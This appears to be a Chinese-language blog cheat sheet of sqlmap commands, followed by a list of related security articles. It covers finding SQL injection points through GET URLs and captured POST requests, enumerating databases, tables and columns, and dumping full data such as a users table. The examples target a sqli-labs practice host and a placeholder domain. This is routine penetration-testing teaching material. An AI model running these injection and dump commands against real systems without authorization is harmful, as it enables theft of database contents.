sqlmap常用命令

@ZZHow(ZZHow1024)

一、扫描注入点

1.GET方法,给URL:

  • #探测该url是否存在漏洞
sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"
  • #如果我们已经知道admin这里是注入点的话,可以在其后面加个*来让sqlmap对其注入
sql 复制代码
python sqlmap.py -u "http://www.xx.com/username/admin*"

2.POST方法,给抓包文件:

  • #bp.txt是我们抓取的http的请求包
sql 复制代码
python sqlmap.py -r bp.txt  
  • #指定参数,当有多个参数而你又知道username参数存在SQL漏洞,你就可以使用-p指定参数进行探测
sql 复制代码
python sqlmap.py -r bp.txt -p username  

二、爆基本信息自动化

0.查看当前的数据库

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --current-db

1.爆出所有的数据库

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --dbs

2.爆出所有的数据表

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --tables

3.爆出数据库中所有的字段

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1"    --columns

三、爆具体信息自动化

1.爆出数据库security中的所有的表

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --tables

2.爆出security数据库中users表中的所有的字段

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --columns

爆出数据库security中的users表中的username字段中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users -C username --dump 

四、爆信数据自动化

1.爆出该数据库中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" --dump-all

2.爆出数据库security中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security --dump-all

3.爆出数据库security中的users表中的所有数据

sql 复制代码
python sqlmap.py -u "http://192.168.10.1/sqli/Less-1/?id=1" -D security -T users --dump-all
相关推荐
介一安全7 小时前
【APK安全】组件安全核心风险与防御指南
网络安全·安全性测试·apk安全
粟悟饭&龟波功10 小时前
【网络安全】一、入门篇:读懂 HTTP 协议
安全·web安全·http
骥龙10 小时前
粤港澳全运会网络安全防御体系深度解析:威胁态势与实战防护
网络·安全·web安全
介一安全13 小时前
【APK安全】系统管理器安全风险与防御指南
网络安全·安全性测试·apk安全·android测试
SteveRocket19 小时前
【产品篇】网络安全运营建设 相关工具
安全·web安全·www.mdrsec.com·cto plus技术服务栈
还是奇怪20 小时前
SQL注入的“无影脚”:详解空格绕过WAF的N种方法
数据库·sql·安全·web安全
emma羊羊1 天前
【文件读写】绕过验证下
网络安全·php·upload·文件读写
KKKlucifer2 天前
Gartner 2025 中国网络安全成熟度曲线深度解读:AI 安全如何重构防御逻辑
人工智能·安全·web安全
云计算练习生2 天前
Linux 操作系统防火墙工具Firewalld常用操作
服务器·网络·网络安全·防火墙·firewalld·linux操作系统
Whoami!2 天前
4-6〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸文件上传漏洞-A
网络安全·信息安全·文件上传漏洞·oscp